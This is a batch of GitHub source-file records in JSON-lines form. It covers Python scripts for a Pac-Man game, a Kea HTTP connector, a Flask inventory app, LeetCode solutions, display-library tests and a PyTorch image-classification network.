return A_sparse\n\ndef encode_entities_tfidf(df_ent):\n # prep for TfidfVectorizer using split on _ as analyzer\n entity_str_per_marker = df_ent.groupby('marker_id').text.agg(lambda x: \"_\".join(x))\n\n vectorizer = TfidfVectorizer(analyzer=lambda x: x.split('_'))\n X = vectorizer.fit_transform(entity_str_per_marker)\n return X\n\ndef similarities_pipeline(csv_out, enc_type='binary'):\n df_ent = load_df_ent()\n\n # only keep entities on multiple markers\n df_ent = entities_to_encode(df_ent)\n\n if enc_type=='binary':\n # binary encoding of each entity\n sparse_encoding = encode_entities_binary(df_ent)\n elif enc_type=='tfidf':\n sparse_encoding = encode_entities_tfidf(df_ent)\n else:\n raise ValueError('invalid enc_type')\n\n # calculate similarity matrix\n similarities = cosine_similarity(sparse_encoding)\n\n # put into dataframe with columns and index of marker_id\n marker_ids = df_ent.groupby('marker_id').count().index\n df_sim = pd.DataFrame(similarities, index=marker_ids)\n df_sim.columns = marker_ids\n\n print(\"similarities matrix made. head:\")\n print(df_sim.head())\n\n if csv_out is not None:\n print('writing output to {}'.format(csv_out))\n df_sim.to_csv(csv_out)\n\n return df_sim\n\n\nif __name__ == '__main__':\n print('running similarities.py from command line')\n if len(argv)>1:\n csv_out = argv[1]\n else:\n csv_out = None\n similarities_pipeline(csv_out, 'binary')\n print('similarities.py: done.')\n","repo_name":"awbirdsall/pastpath","sub_path":"scripts/similarities.py","file_name":"similarities.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"36658909071","text":"import pygame\nimport sys\nfrom main_menu import Main_Menu\nfrom sprite_sheet import Sprite_Sheet\nfrom character import Pacman\nfrom character import Ghost\nfrom maze import Maze\nfrom text import Text\nimport settings\n\nclass Game:\n\n def __init__(self, SCREEN_WIDTH, SCREEN_HEIGHT):\n\n pygame.init()\n #Checks if game is running\n self.is_running = True\n #Screen Dimensions and info\n self.SCREEN_WIDTH = SCREEN_WIDTH\n self.SCREEN_HEIGHT = SCREEN_HEIGHT\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Test\")\n self.clock = pygame.time.Clock()\n\n #colors\n self.colors ={\"Black\": (0, 0, 0),\n \"Red\": (255, 0, 0),\n \"Green\": (0, 255, 0),\n \"Blue\": (0, 0, 255),\n \"White\": (255, 255, 255),\n \"Yellow\": (255, 255, 0)}\n\n #Settings\n self.pacman_lives_count = 3\n\n\n #Create Objects Here\n self.sprite_sheet = Sprite_Sheet(\"images/Pacman.png\", \"text files/Pacman.xml\", self.screen)\n self.sprite_dictionary = self.sprite_sheet.dataDict\n self.maze = Maze(self.screen, self.sprite_sheet, \"text files/pacmanportalmaze.txt\")\n self.pacman = Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x, self.maze.scale_size_y,\n self.maze.pacman_start_x, self.maze.pacman_start_y)\n self.score_text = Text(self.screen, \"Points: \",self.colors[\"White\"], self.colors[\"Black\"],\n self.SCREEN_WIDTH/2, self.SCREEN_HEIGHT-self.maze.reserved_height)\n self.lives_text = Text(self.screen, \"Lives: \", self.colors[\"White\"], self.colors[\"Black\"],\n self.maze.half_reserved_width, self.SCREEN_HEIGHT-self.maze.reserved_height)\n self.pacman_menu = Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x * 3,\n self.maze.scale_size_y * 3, -200, self.maze.scale_size_y)\n\n #Ghost\n self.ghost_blinky = Ghost(self.screen, self.sprite_sheet, self.maze.scale_size_x, self.maze.scale_size_y,\n self.maze.blinky_start_x, self.maze.blinky_start_y)\n\n self.pacman_lives_stored = []\n self.load_pacman_lives()\n\n #Center Text Properly\n self.score_text.textrect.x -= self.score_text.textrect.w /2\n\n #Dubugging and Logs\n #self.sprite_sheet.print_dic_log()\n\n #Others\n self.allow_movement = False\n self.main_menu = True\n self.pacman_game = False\n\n\n def __check_events(self, allow_movement):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self.pacman.movement_keydown(event, allow_movement)\n if event.key == pygame.K_SPACE:\n self.main_menu = False\n self.pacman_game = True\n\n #elif event.type == pygame.KEYUP:\n # self.pacman.movement_keyup(event)\n\n def __fill_display(self, color):\n self.screen.fill(self.colors[color])\n\n def __game_display(self):\n self.update_movement()\n self.ghost_blinky.check_collision(self.maze, self.pacman)\n self.ghost_blinky.movement()\n self.score_text.recalculate_text(self.maze.points)\n self.maze.render_maze()\n self.pacman.render_character()\n self.ghost_blinky.render_character()\n self.render_lives()\n # Here\n self.allow_movement = self.pacman.check_collision(self.maze, self.allow_movement)\n\n def __refresh_display(self):\n\n pygame.display.update()\n self.clock.tick(settings.FPS)\n\n def update_movement(self):\n self.pacman.update_movement()\n\n def set_pacman_position(self):\n self.pacman.rect.x = self.maze.pacman_start_x\n self.pacman.rect.y = self.maze.pacman_start_y\n\n def run_game(self):\n\n # Objects\n menu = Main_Menu(self.screen, self.colors)\n\n while self.is_running:\n 
self.__check_events(self.allow_movement)\n\n self.__fill_display(\"Black\")\n if self.main_menu:\n menu.display_menu()\n self.pacman_menu.render_character()\n self.pacman_menu.update_main_menu_movement()\n elif self.pacman_game:\n self.__game_display()\n\n self.__refresh_display()\n\n def load_pacman_lives(self):\n x = self.lives_text.textrect.x + self.lives_text.textrect.w\n #y = self.SCREEN_HEIGHT-self.maze.reserved_height + self.lives_text.textrect.h/4\n y = self.lives_text.textrect.centery\n for life in range(self.pacman_lives_count):\n self.pacman_lives_stored.append(Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x,\n self.maze.scale_size_y, x, y))\n x += self.pacman.rect.w+self.pacman.rect.w/2\n\n for life in self.pacman_lives_stored:\n life.rect.y -= life.rect.h/2\n\n def render_lives(self):\n self.score_text.display_text()\n self.lives_text.display_text()\n\n for lives in self.pacman_lives_stored:\n lives.render_character()","repo_name":"BryanCastro/CPSC-386","sub_path":"Pacman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10618256399","text":"import httplib\n\nfrom kea_conn import CAResponse # CARequest\n\ndef send_to_control_agent(params):\n \"\"\" Sends a request to Control Agent, receives a response and returns it.\"\"\"\n\n # Establish HTTP connection first.\n conn = httplib.HTTPConnection(params.http_host, params.http_port)\n conn.connect()\n\n # Use POST to send it\n _ = conn.putrequest('POST', params.path)\n\n # Send the headers first\n for k in params.headers:\n conn.putheader(k, params.headers[k])\n conn.endheaders()\n\n # Send the body (i.e. the actual content)\n conn.send(params.content)\n\n # Now get the response\n resp = conn.getresponse()\n\n # Now get the response details, put it in CAResponse and\n # return it\n result = CAResponse(resp.status, resp.reason, resp.read())\n conn.close()\n\n return result\n","repo_name":"telekom/dt-kea-netconf","sub_path":"src/bin/shell/kea_connector2.py","file_name":"kea_connector2.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"30530978712","text":"class ticket():\r\n us_price=100\r\n weekend_price=100*(1+100*1.2)\r\n kids_price=us_price/2\r\n kids_weekend=(100*(1+100*1.2))/2\r\n number_child=2\r\n number_adult=3\r\n def week_price(self,num_child,num_adult):\r\n self.num_child=num_child\r\n self.num_adult=num_adult\r\n print(\"child price is %d,adult price is %d\"%(self.num_child*self.kids_price,self.num_adult*self.us_price))\r\n","repo_name":"1565937966/Bowen","sub_path":"python file/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18282964932","text":"class ProductOfNumbers:\n\n def __init__(self):\n self.p = [1]\n\n def add(self, num: int) -> None:\n if num == 0:\n self.p = [1]\n else:\n self.p.append(self.p[-1]*num)\n\n def getProduct(self, k: int) -> int:\n if k >= len(self.p):\n return 0\n else:\n return self.p[-1] / self.p[-k-1]\n\n# Your ProductOfNumbers object will be instantiated and called as such:\n# obj = ProductOfNumbers()\n# obj.add(num)\n# param_2 = obj.getProduct(k)\n\nif __name__ == '__main__':\n obj = ProductOfNumbers()\n obj.add(3)\n obj.add(0)\n obj.add(2)\n obj.add(5)\n obj.add(4)\n print(obj.getProduct(2))\n print(obj.getProduct(3))\n print(obj.getProduct(4))\n obj.add(8)\n print(obj.getProduct(2))\n \n","repo_name":"fghpdf/leetcode","sub_path":"py/product_of_the_last_k_numbers/product_of_the_last_k_numbers.py","file_name":"product_of_the_last_k_numbers.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"74674678802","text":"class Solution:\n def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n roots = set(dictionary)\n result = []\n for word in sentence.split():\n found = False\n current = \"\"\n for c in word:\n current += c\n if current in roots:\n result.append(current)\n found = True\n break\n\n if not found:\n result.append(word)\n\n return \" \".join(result)\n","repo_name":"stbrumme/leetcode","sub_path":"0648.py","file_name":"0648.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"37878921004","text":"from luma.core.device import dummy\nfrom luma.core.legacy import text, textsize, show_message\nfrom luma.core.legacy.font import proportional, CP437_FONT, LCD_FONT\n\nfrom unittest.mock import Mock, call\n\n\ndef test_textsize():\n \"\"\"\n The bounding box of the text, as drawn in the specified font, is correctly\n calculated.\n \"\"\"\n assert textsize(\"Hello world\") == (88, 8)\n assert textsize(\"Hello world\", font=proportional(CP437_FONT)) == (71, 8)\n\n\ndef test_text_space():\n \"\"\"\n Draw a space character.\n \"\"\"\n draw = Mock(unsafe=True)\n text(draw, (2, 2), \" \", fill=\"white\")\n draw.point.assert_not_called()\n\n\ndef test_text_char():\n \"\"\"\n Draw a text character.\n \"\"\"\n draw = Mock(unsafe=True)\n text(draw, (2, 2), \"L\", font=LCD_FONT, fill=\"white\")\n draw.point.assert_has_calls([\n call((2, 2), fill='white'),\n call((2, 3), fill='white'),\n call((2, 4), fill='white'),\n call((2, 5), fill='white'),\n call((2, 6), fill='white'),\n call((2, 7), fill='white'),\n call((2, 8), fill='white'),\n call((3, 8), fill='white'),\n call((4, 8), fill='white'),\n call((5, 8), fill='white'),\n call((6, 8), fill='white')\n ])\n\n\ndef test_show_message():\n \"\"\"\n Scroll a message right-to-left across the devices display.\n \"\"\"\n device = dummy()\n show_message(device, 'text', scroll_delay=0.0)\n","repo_name":"rm-hull/luma.core","sub_path":"tests/test_legacy.py","file_name":"test_legacy.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"3"}
+{"seq_id":"18071926368","text":"from flask import Blueprint, render_template, url_for, redirect, flash, request, jsonify\n\nfrom inventory.models.inventory import Inventory\nfrom inventory.models.product import Product\nfrom inventory.models.location import Location\nfrom inventory.models.transfer import Transfer\n\n\nfrom inventory.extensions import db\n\nblueprint = Blueprint('inventory', __name__)\n\n\n@blueprint.route('/inventory')\ndef index():\n data_inventory = Inventory.query.all()\n has_inventory = bool(data_inventory)\n # TODO: Pass has_inventory to render to display warning message\n\n return render_template('inventory/index.html',\n data_inventory=data_inventory,\n has_inventory=has_inventory)\n\n\n@blueprint.route('/product', methods=['GET', 'POST'])\ndef product():\n if (request.method == \"POST\") and ('product_name'\n in request.form) and ('product_qty'\n in request.form):\n product_name = request.form[\"product_name\"]\n product_qty = request.form[\"product_qty\"]\n \n print({product_name, product_qty})\n new_product = Product(product_name=product_name,\n product_qty=product_qty)\n\n try:\n db.session.add(new_product)\n db.session.commit()\n return redirect(url_for(\"product\"))\n\n except:\n products = Product.query.order_by(Product.product_id).all()\n return render_template(\"inventory/product.html\", products=products)\n else:\n products = Product.query.order_by(Product.product_id).all()\n print(products)\n return render_template(\"inventory/product.html\", products=products)\n\n@blueprint.route(\"/update-product/\", methods=[\"POST\"])\ndef updateProduct(product_id):\n product = Product.query.get_or_404(product_id)\n old_product = product\n \n product.product_name = request.form['product_name']\n product.product_qty = request.form['product_qty']\n\n \n try:\n \n update_transfer= Transfer.query\\\n .join(Product, Transfer.product_name == old_product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n print(update_transfer)\n for trans in update_transfer:\n trans.product_name = product.product_name\n trans.product_qty = product.product_qty\n db.session.commit()\n return redirect(\"/product\")\n\n except:\n print(\"There was an issue while updating the Product\")\n render_template(\"inventory/product.html\", error=\"There was an issue while updating the Product\")\n\n\n@blueprint.route(\"/location\", methods=['GET', 'POST'])\ndef location():\n if (request.method == \"POST\") and ('location_name' in request.form):\n location_name = request.form[\"location_name\"]\n new_location = Location(location_name=location_name)\n\n try:\n db.session.add(new_location)\n db.session.commit()\n return redirect(\"/location\")\n\n except:\n locations = Location.query.order_by(Location.location_id).all()\n return render_template(\"inventory/location.html\", locations=locations)\n else:\n locations = Location.query.order_by(Location.location_id).all()\n return render_template(\"inventory/location.html\", locations=locations)\n \n\n@blueprint.route(\"/update-location/\", methods=[\"POST\"])\ndef updateLocation(location_id):\n location = Location.query.get_or_404(location_id)\n old_location = location\n \n location.location_name = request.form['location_name']\n\n \n try:\n db.session.commit() \n # trans1 = Transfer.query.filter(Transfer.transfer_from == old_location.transfer_from).all()\n # trans2 = Transfer.query.filter(Transfer.transfer_to == 
old_location.transfer_to).all() \n\n # for tra in trans1:\n # tra.transfer_to = location.transfer_to\n # for tra in trans2:\n # tra.transfer_to = location.transfer_to\n # db.session.commit()\n return redirect(\"/location\")\n\n except:\n print(\"There was an issue while updating the Product\")\n render_template(\"inventory/location.html\", error=\"There was an issue while updating the Product\")\n\n\n@blueprint.route(\"/transfers\", methods=['GET', 'POST'])\ndef transfers():\n if request.method == \"POST\" :\n product_name = request.form[\"product_name\"]\n qty = request.form[\"product_qty\"]\n transfer_from = request.form[\"transfer_from\"]\n transfer_to = request.form[\"transfer_to\"]\n \n if transfer_from != transfer_to and transfer_to != transfer_from:\n new_transfer = Transfer(product_name=product_name, product_qty=qty, transfer_from=transfer_from, transfer_to=transfer_to)\n new_inventory = Inventory(location=transfer_to, product_name=product_name, product_qty=qty)\n \n try:\n db.session.add(new_transfer)\n db.session.add(new_inventory)\n db.session.commit()\n return redirect(\"/transfers\")\n except:\n return render_template('inventory/transfer.html', error=\"There Was an issue while adding a new Transfer\")\n else:\n products = Product.query.order_by(Product.product_id).all()\n locations = Location.query.order_by(Location.location_id).all()\n transfers = Transfer.query\\\n .join(Product, Transfer.product_name == Product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n return render_template(\"inventory/transfer.html\", transfers=transfers, products=products, locations=locations, error=\"There Was an issue while adding a new Transfer\")\n else:\n products = Product.query.order_by(Product.product_id).all()\n locations = Location.query.order_by(Location.location_id).all()\n transfers = Transfer.query\\\n .join(Product, Transfer.product_name == Product.product_name)\\\n .add_columns(\n Transfer.transfer_id,\n Transfer.product_qty,\n Product.product_name, \n Transfer.transfer_from,\n Transfer.transfer_to,\n Transfer.transfer_time)\\\n .all()\n \n return render_template(\"inventory/transfer.html\", transfers=transfers, products=products, locations=locations)\n\n\n\n@blueprint.route(\"/delete-product/\")\ndef deleteProduct(product_id):\n product_to_delete = Product.query.get_or_404(product_id)\n\n try:\n db.session.delete(product_to_delete)\n db.session.commit()\n return redirect(\"/product\")\n except:\n return \"There was an issue while deleteing the Product\"\n \n@blueprint.route(\"/delete-location/\")\ndef deleteLocation(location_id):\n location_to_delete = Location.query.get_or_404(location_id)\n\n try:\n db.session.delete(location_to_delete)\n db.session.commit()\n return redirect(\"/location\")\n except:\n return \"There was an issue while deleteing the Product\"","repo_name":"esogelola/Fall-2022---Shopify-Developer-Intern","sub_path":"inventory/controllers/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
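The update/delete routes in the record above rely on Flask's `<int:...>` URL converters to feed the view argument (e.g. `product_id`). A minimal self-contained sketch of that mechanism, with illustrative names:

```python
from flask import Flask

app = Flask(__name__)

@app.route("/update-product/<int:product_id>")
def update_product(product_id):
    # product_id arrives already converted to int; non-numeric URLs 404 automatically
    return f"would update product {product_id}"

if __name__ == "__main__":
    with app.test_client() as client:
        print(client.get("/update-product/7").data)           # b'would update product 7'
        print(client.get("/update-product/abc").status_code)  # 404
```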
+{"seq_id":"15176184492","text":"#when rolling a dice (numbers 1-20) 20 is max dice value for magic the gathering\nimport random\n\ndef rollDice(min, max):\n while True:\n print(\"Roling dice...\")\n number = random.randint(min,max)\n print(f\"Your number: {number}\")\n break\n\nrollDice(1,20)","repo_name":"moris96/magic-the-gathering-life-counter","sub_path":"magic the gathering life counter/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2033433444","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\nimport math\n\n\n\ndef DepthWiseConv(in_channels, stride=1):\n \"\"\"\n Depthwise Separable Convolution\n in_channels == out_channels == groups\n\n its task is responsible for feature abstraction\n can also perform subsampling\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=3, stride=stride, padding=1, groups=in_channels, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU6(inplace=True),\n )\n )\n\n\n\ndef PointWiseGroupConv(channel_in, channel_out, group_number=1, stride=1):\n \"\"\"\n Pointwise 1x1 Group Convolution\n\n group number is 3 for general-wise convolution (depthwise, heightwise, and widthwise convolutions)\n\n its task is to project the input feature map into expansion layer for feature abstraction\n it is also responsible for subsampling.\n\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=stride, padding=0, groups=group_number, bias=False),\n nn.BatchNorm2d(channel_out),\n nn.ReLU6(inplace=True)\n )\n )\n\n\n\ndef PointWiseConv(channel_in, channel_out):\n \"\"\"\n The regular 1x1 convolution without subsmpling\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=1, padding=0, groups=1, bias=False),\n nn.BatchNorm2d(channel_out),\n nn.ReLU6(inplace=True)\n )\n )\n\n\n\ndef LinearConv(channel_in, channel_out):\n \"\"\"\n The 1x1 linear convolution with ReLU\n \"\"\"\n return (\n nn.Sequential(\n nn.Conv2d(in_channels=channel_in, out_channels=channel_out, kernel_size=1, stride=1, padding=0, groups=1, bias=False),\n nn.BatchNorm2d(channel_out)\n )\n )\n\n\n\nclass ChannelShuffleBlock(nn.Module):\n \"\"\"\n Channel shuffle operation from ShuffleNet\n \"\"\"\n def __init__(self, groups=3):\n super(ChannelShuffleBlock, self).__init__()\n self.groups = groups\n\n def forward(self, x):\n '''Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]'''\n N, C, H, W = x.size()\n g = self.groups\n return x.view(N, g, C // g, H, W).permute(0, 2, 1, 3, 4).reshape(N, C, H, W)\n\n\n\nclass EqualSplitBlock(nn.Module):\n \"\"\"\n It is responsible for distributing the same subsets of feature maps to the 3 parallel convolutions\n \"\"\"\n def __init__(self, n):\n super(EqualSplitBlock, self).__init__()\n self.n = n\n\n def forward(self, x):\n c3 = int(x.size(1))\n c1 = int(x.size(1) // self.n)\n c2 = c3 - c1\n return x[:, :c1, :, :], x[:, c1:c2, :, :], x[:, c2:c3, :, :]\n\n\n\nclass SpatialwiseConv(nn.Module):\n \"\"\"\n Spatial-wise Convolution: heightwise convolution and widthwise convolution\n now the grouping is performed on width dimension and height dimension\n \"\"\"\n def __init__(self, channel_proxy, stride=1):\n super(SpatialwiseConv, self).__init__()\n self.conv = nn.Conv2d(in_channels=channel_proxy, out_channels=channel_proxy, kernel_size=3,\n stride=stride, padding=1, groups=channel_proxy, bias=False)\n self.bn = nn.BatchNorm2d(channel_proxy)\n self.relu = nn.ReLU6(inplace=True)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n x = self.relu(x)\n return x\n\n\n\nclass DimensionTranspose(nn.Module):\n \"\"\"\n tensor dimension transpose\n \"\"\"\n def __init__(self, spatial_type=\"heightwise\"):\n super(DimensionTranspose, self).__init__()\n self.spatial_type = spatial_type\n\n def forward(self, x):\n #N, C, H, W = 
x.size()\n if self.spatial_type == \"heightwise\":\n # 交换 C, H两个维度\n x = x.transpose(1,2)\n elif self.spatial_type == \"widthwise\":\n # 交换 C, W两个维度\n x = x.transpose(1,3)\n return x\n\n\n\n\nclass DepthwiseSeparableConv(nn.Module):\n def __init__(self, in_channel, out_channel, stride=1):\n super(DepthwiseSeparableConv, self).__init__()\n self.depthwiseConv = DepthWiseConv(in_channels=in_channel, stride=stride)\n self.linearConv = LinearConv(channel_in=in_channel, channel_out=out_channel)\n\n def forward(self, x):\n x = self.depthwiseConv(x)\n x = self.linearConv(x)\n return x\n\n\n\n\nclass SpatialWiseSeparableConv(nn.Module):\n def __init__(self, in_channel, hidden_dim, out_channel, input_height, input_width, stride=1):\n super(SpatialWiseSeparableConv, self).__init__()\n\n # if stride ==2, the width and height of feature maps are reduced by 1/2\n if stride == 2:\n input_height = input_height // 2\n input_width = input_width // 2\n else:\n input_height = input_height\n input_width = input_width\n\n assert hidden_dim % 3 == 0\n subset_in_dim = hidden_dim // 3\n\n self.pointwiseGroupConv = PointWiseGroupConv(channel_in=in_channel, channel_out=hidden_dim, group_number=3, stride=stride)\n\n # channel shuffling\n self.channelShuffle = ChannelShuffleBlock(groups=3)\n\n # channel splitting\n self.split = EqualSplitBlock(n=3)\n\n # depthwise convolution in the first branch of parallels\n self.depthwiseConv = DepthWiseConv(in_channels=subset_in_dim, stride=1)\n\n # dimension transpose for heightwise convolution [-1, 48, 112, 112] -> [-1, 112, 48, 112]\n self.heightwiseTranspose = DimensionTranspose(spatial_type=\"heightwise\")\n\n # heightwise convolution in the second branch of parallels [-1, 112, 48, 112]->[-1, 112, 48, 112]\n self.heightwiseConv = SpatialwiseConv(channel_proxy=input_height, stride=1)\n\n # dimension transpose for heightwise convolution [-1, 48, 112, 112] -> [-1, 112, 112, 48]\n #self.widthwiseTranspose = DimensionTranspose(spatial_type=\"widthwise\")\n\n # widthwise convolution in the third branch of parallels [-1, 112, 112, 48] -> [-1, 112, 112, 48]\n #self.widthwiseConv = SpatialwiseConv(channel_proxy=input_width, stride=1)\n\n # the final linear projection convolution\n self.linearConv = LinearConv(channel_in=hidden_dim, channel_out=out_channel)\n\n def forward(self, x):\n expansion_layer = self.pointwiseGroupConv(x)\n expansion_shuffle = self.channelShuffle(expansion_layer)\n split1, split2, split3 = self.split(expansion_shuffle)\n split1 = self.heightwiseTranspose(split1)\n split1 = self.heightwiseConv(split1)\n split1 = self.heightwiseTranspose(split1)\n split2 = self.heightwiseTranspose(split2)\n split2 = self.heightwiseConv(split2)\n split2 = self.heightwiseTranspose(split2)\n split3 = self.heightwiseTranspose(split3)\n split3 = self.heightwiseConv(split3)\n split3 = self.heightwiseTranspose(split3)\n # residual connection to improve gradient flow and feature reuse\n concat_tensor = torch.cat([split1, split2, split3], 1) + expansion_shuffle\n # linear projection to output feature map\n out = self.linearConv(concat_tensor)\n return out\n\n\n\n\nclass GSCBlock(nn.Module):\n\n def __init__(self, input_height, input_width, channel_in, channel_out, expand_ratio, stride):\n super(GSCBlock, self).__init__()\n\n self.stride = stride\n assert stride in [1, 2]\n\n # use the residual shortcut when stride == 1 and channel_in equals channel_out\n self.use_res_connect = self.stride == 1 and channel_in == channel_out\n\n # the dimension of expansion layer: 24 * 6 = 144\n hidden_dim = 
channel_in * expand_ratio\n\n if expand_ratio == 1:\n self.conv = nn.Sequential(DepthwiseSeparableConv(in_channel=hidden_dim, out_channel=channel_out, stride=stride))\n else:\n self.conv = nn.Sequential(SpatialWiseSeparableConv(in_channel=channel_in, hidden_dim=hidden_dim, out_channel=channel_out,\n input_height=input_height, input_width=input_width, stride=stride))\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\n\nclass GSCNetHeightOnly(nn.Module):\n def __init__(self, input_height=224, input_width=224, in_channels=3, n_classes=1000):\n super(GSCNetHeightOnly, self).__init__()\n\n self.in_planes = 36\n\n # 因为第一次下采样,特征图谱的长和宽变为input的1/2\n self.input_height = input_height // 2\n self.input_width = input_width // 2\n\n # 第一次卷积,并下采样 224x224x3 -> 112x112x36\n self.stem_conv = nn.Conv2d(in_channels=in_channels, out_channels=36, kernel_size=3, stride=2, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(36)\n\n layers = []\n\n self.gsc_block_configs = [\n # t, c, n, s\n [1, 18, 1, 1], # 112 * 112 * 36 -> 112 * 112 * 18\n [6, 24, 2, 2], # 112 * 112 * 18 -> 56 * 56 * 24\n [6, 36, 3, 2], # 56 * 56 * 24 -> 28 * 28 * 36\n [6, 60, 4, 2], # 28 * 28 * 36 -> 14 * 14 * 60\n [6, 96, 3, 1], # 14 * 14 * 60 -> 14 * 14 * 96\n [6, 162, 3, 2], # 14 * 14 * 96 -> 7 * 7 * 162\n [6, 321, 1, 1] # 7 * 7 * 162 -> 7 * 7 * 321\n ]\n\n # t= expansion factor, c = output channel number, n = bottleneck number, s = stride\n for t, c, n, s in self.gsc_block_configs:\n for i in range(n):\n # bottleneck number > 1, 总是第一个下采样\n stride = s if i == 0 else 1\n layers.append(GSCBlock(input_height=self.input_height, input_width=self.input_width,\n channel_in=self.in_planes, channel_out=c, expand_ratio=t, stride=stride))\n self.in_planes = c\n\n if stride == 2:\n self.input_height = self.input_height // 2\n self.input_width = self.input_width // 2\n else:\n self.input_height = self.input_height\n self.input_width = self.input_width\n\n self.layers = nn.Sequential(*layers)\n\n # 最后一次卷积\n self.last_conv = PointWiseConv(self.in_planes, 1280)\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n\n # 分类器\n self.classifier = nn.Linear(1280, n_classes)\n\n # 初始化权重\n self._initialize_weights()\n\n\n def forward(self, x):\n x = F.relu(self.bn1(self.stem_conv(x)))\n x = self.layers(x)\n x = self.last_conv(x)\n x = self.avg_pool(x).view(-1, 1280)\n x = self.classifier(x)\n return x\n\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n\n\nif __name__==\"__main__\":\n model = GSCNetHeightOnly(n_classes=1000)\n summary(model, (3, 224, 224), device='cpu')\n from thop import profile\n\n input_size = (1, 3, 224, 224)\n flops, params = profile(model=model, input_size=input_size)\n print('Total params: %.2fM' % (params / 1000000.0))\n print('Total flops: %.2fM' % (flops / 1000000.0))\n","repo_name":"shicheng123moon/GSCNet","sub_path":"models/GSCNetHeightOnly.py","file_name":"GSCNetHeightOnly.py","file_ext":"py","file_size_in_byte":11876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
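The `ChannelShuffleBlock` in the record above mixes information between groups with a view/permute/reshape round trip. A standalone check of that exact trick on a tiny tensor:

```python
# Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,W] -> [N,C,H,W]
import torch

def channel_shuffle(x: torch.Tensor, groups: int) -> torch.Tensor:
    n, c, h, w = x.size()
    return x.view(n, groups, c // groups, h, w).permute(0, 2, 1, 3, 4).reshape(n, c, h, w)

x = torch.arange(6).float().view(1, 6, 1, 1)    # channels labelled 0..5
print(channel_shuffle(x, 3).flatten().tolist())  # [0.0, 2.0, 4.0, 1.0, 3.0, 5.0]
```

With 3 groups, channels (0,1)(2,3)(4,5) are interleaved to 0,2,4,1,3,5, so the next grouped convolution sees channels from every group.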
+{"seq_id":"39885370485","text":"a, b = map(int,input().split())\n\ndef f(n):\n new_num = str(n)[::-1]#[::-1] -> 처음부터 끝까지 -1칸씩 = 역순으로 재배치\n return(int(new_num))\n\nif f(a) > f(b):\n print(f(a))\nelse:\n print(f(b))\n","repo_name":"Alice-1012/BOJ","sub_path":"Class 1/2908.py","file_name":"2908.py","file_ext":"py","file_size_in_byte":209,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
